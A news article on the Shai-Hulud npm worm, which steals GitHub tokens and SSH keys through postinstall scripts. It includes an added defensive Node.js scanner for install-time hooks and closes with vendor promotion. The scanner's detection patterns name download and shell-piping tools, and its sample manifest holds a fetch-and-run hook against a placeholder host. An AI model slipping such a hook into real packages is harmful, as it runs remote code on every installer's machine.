New 'Shai-Hulud' Worm Threatens Open-Source Software Supply Chain
A new worm, dubbed 'Shai-Hulud', is causing concern in the open-source software community. It's targeting developers using Linux and macOS, aiming to steal sensitive credentials like GitHub access tokens and SSH keys. The worm has compromised over 187 packages in the NPM repository, the central hub for reusable code packages.
Shai-Hulud spreads by embedding a malicious 'postinstall' script in the package.json file of infected packages. npm runs that script automatically when the package is installed, which launches the multi-stage malware. The worm is an evolution of an earlier threat actor campaign known as 's1ngularity'. To spread further, it focuses on a maintainer's top 20 most popular packages.
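Because the infection relies on an install-time hook in package.json, an installed dependency tree can be audited for such hooks. The Node.js script below is an added example, not code from the article or from Trend Micro; it also checks the 'preinstall' and 'install' hooks, which npm runs at install time as well. The function names, the heuristic patterns and the sample manifest are assumptions made for illustration.

```javascript
// Added example: flag npm lifecycle scripts that run automatically at install time.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristics chosen for this example (assumptions, not indicators from the article).
const RISKY = [
  [/\b(curl|wget)\b/, 'downloads content'],
  [/\bnode\s+(-e|--eval)\b/, 'inline node eval'],
  [/\|\s*(ba|z)?sh\b/, 'pipes into a shell'],
  [/\bbase64\b/, 'base64 handling'],
];

// Pure check: takes a parsed package.json, returns one finding per install hook.
function auditManifest(manifest) {
  const scripts = (manifest && typeof manifest.scripts === 'object' && manifest.scripts) || {};
  return INSTALL_HOOKS.filter((hook) => typeof scripts[hook] === 'string').map((hook) => ({
    name: manifest.name || '(unnamed)',
    version: manifest.version || '(none)',
    hook,
    command: scripts[hook],
    reasons: RISKY.filter(([re]) => re.test(scripts[hook])).map(([, why]) => why),
  }));
}

// Walk a node_modules tree (scoped and nested packages included) and audit every manifest.
async function scanNodeModules(root) {
  const fs = await import('node:fs');
  const path = await import('node:path');
  const findings = [];
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      if (!entry.isDirectory()) continue; // symlinks are not followed
      const sub = path.join(dir, entry.name);
      try {
        const raw = fs.readFileSync(path.join(sub, 'package.json'), 'utf8');
        findings.push(...auditManifest(JSON.parse(raw)));
      } catch { /* no manifest here, or it is malformed: keep walking */ }
      walk(sub);
    }
  };
  walk(root);
  return findings;
}

// Constructed manifest (not a real package) with the kind of hook the article describes.
const SAMPLE = {
  name: 'example-pkg',
  version: '1.0.0',
  scripts: { test: 'jest', postinstall: 'curl -fsSL https://example.invalid/setup.sh | sh' },
};
console.log(auditManifest(SAMPLE));
```

Call `scanNodeModules('./node_modules')` to audit an installed tree and review every finding, including those with an empty `reasons` list. Installing with npm's `--ignore-scripts` option keeps these hooks from running at all.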
Trend Micro, a leading cybersecurity company, recommends using Trend Vision One™ Threat Insights for defence against Shai-Hulud. This solution provides real-time threat intelligence to help stay ahead of evolving threats.
The Shai-Hulud worm's primary objective is to steal GitHub access tokens and SSH keys, posing a significant risk to the open-source software supply chain. With over 187 compromised packages in the NPM repository, developers are urged to stay vigilant and consider using Trend Micro's security solutions to protect their sensitive credentials.